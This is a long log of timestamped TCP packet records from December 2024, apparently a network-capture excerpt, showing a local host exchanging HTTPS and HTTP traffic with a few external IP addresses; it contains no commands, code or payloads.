                                                  Dec 2, 2024 07:25:02.534219027 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.534275055 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.534281969 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.537852049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.537902117 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.537908077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.540659904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.540720940 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.540729046 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.543704033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.543761969 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.543768883 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.547338963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.547399044 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.547405958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.550174952 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.550231934 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.550239086 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.553138971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.553200006 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.553208113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.556617975 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.556679010 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.556685925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.560153961 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.560219049 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.560225964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.562999964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.563057899 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.563066006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.565989017 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.566047907 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.566056967 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.569672108 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.569737911 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.569745064 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.572494984 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.572547913 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.572555065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.575669050 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.575737000 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.575745106 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.729762077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.729835033 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.729844093 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.732534885 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.732542992 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.732566118 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.732590914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.732599974 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.732671976 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.735461950 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.735470057 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.735492945 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.735517979 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.735532999 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.739150047 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.739157915 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.739217043 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.739224911 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.742149115 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.742156029 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.742211103 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.742218971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.744966030 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.744997025 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.745031118 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.745038033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.745079994 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.748635054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.748646975 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.748703957 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.748712063 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.751612902 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.751669884 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.751677036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.755522966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.755582094 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.755589008 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.757752895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.757819891 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.757827997 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.761509895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.761567116 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.761574030 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.764427900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.764486074 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.764492989 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.767478943 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.767535925 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.767541885 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.770993948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.771044970 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.771051884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.773919106 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.773976088 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.773983955 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.777647972 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.777702093 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.777709007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.930922031 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.931060076 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.931077957 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.934010029 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.934017897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.934042931 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.934068918 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.934077978 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.934118032 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.937529087 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.937537909 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.937556982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.937592030 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.937603951 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.940366983 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.940375090 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.940429926 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.940437078 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.943242073 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.943272114 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.943303108 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.943310976 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.943336010 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:02.943363905 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.943377972 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:02.948138952 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:03.187020063 CET8049171146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:03.187164068 CET4917180192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:08.184607983 CET8049171146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:08.184670925 CET4917180192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:09.366417885 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:09.366449118 CET4917180192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:15.491971016 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:15.492016077 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:15.492069006 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:15.493699074 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:15.493711948 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:16.749439001 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:16.749505043 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:16.753889084 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:16.753895998 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:16.754179001 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:16.828042030 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:16.875324011 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.212126017 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.212155104 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.212284088 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.212301016 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.316296101 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.316313028 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.316346884 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.316467047 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.316500902 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.417010069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.417021990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.417042017 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.417066097 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.417081118 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.417090893 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.445483923 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.445494890 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.445513010 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.445565939 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.445580959 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.445615053 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.468734980 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.468744993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.468767881 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.468808889 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.468822002 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.469006062 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.602658033 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.602672100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.602696896 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.602763891 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.605195045 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.605200052 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.618053913 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.618063927 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.618084908 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.618127108 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.618134022 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.618145943 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.632601023 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.632613897 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.632641077 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.632668972 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.632678032 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.632720947 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.649991035 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.650002003 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.650023937 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.650151968 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.664288044 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.664298058 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.664324999 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.664351940 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.664365053 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.681435108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.681447029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.681528091 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.681541920 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.699201107 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.699234962 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.699362040 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.699376106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.699419975 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.803649902 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.803659916 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.803776979 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.803787947 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.813102961 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.813138962 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.813168049 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.813179970 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.813221931 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.825158119 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.825169086 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.825285912 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.825300932 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.837922096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.838047028 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.838063955 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.847568989 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.847743988 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.847752094 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.857336044 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.857367039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.857422113 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.857431889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.857470989 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.870110035 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.870120049 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.870177031 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.870186090 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.878213882 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.878298044 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.878308058 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.891112089 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.891182899 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.891194105 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.925488949 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.925522089 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.925574064 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.925584078 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.925621033 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.938116074 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.938124895 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.938188076 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.938194990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.947784901 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.947818041 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.947871923 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.947880030 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.947923899 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.960853100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.960865021 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:17.960925102 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:17.960932016 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.009995937 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.010106087 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.010114908 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.015310049 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.015330076 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.015348911 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.015388012 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.015397072 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.015438080 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.022165060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.022173882 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.022228003 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.022242069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.031167030 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.031178951 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.031232119 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.031244993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037786007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037796974 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.037842989 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.037867069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044374943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044384956 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.044425011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.044435978 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051666021 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051675081 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.051717997 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.051728964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056015968 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056024075 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.056080103 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.056087971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060163021 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060198069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060210943 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.060218096 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.060252905 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.065710068 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.065720081 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.065776110 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.065783978 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.070044994 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.070106030 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.070117950 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.074944019 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.075001001 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.075009108 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.079231977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.079289913 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.079298973 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.084604025 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.084656000 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.084664106 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.088845015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.088905096 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.088912964 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.093405008 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.093463898 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.093471050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.097811937 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.207376003 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.207587004 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.207601070 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210036039 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210045099 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210067987 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210108042 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.210119963 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.210165977 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.217690945 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:18.217771053 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.217883110 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:18.218745947 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218755960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218776941 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.218802929 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.218828917 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:18.221528053 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.221535921 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:18.221554995 CET44349172142.215.209.77192.168.2.22
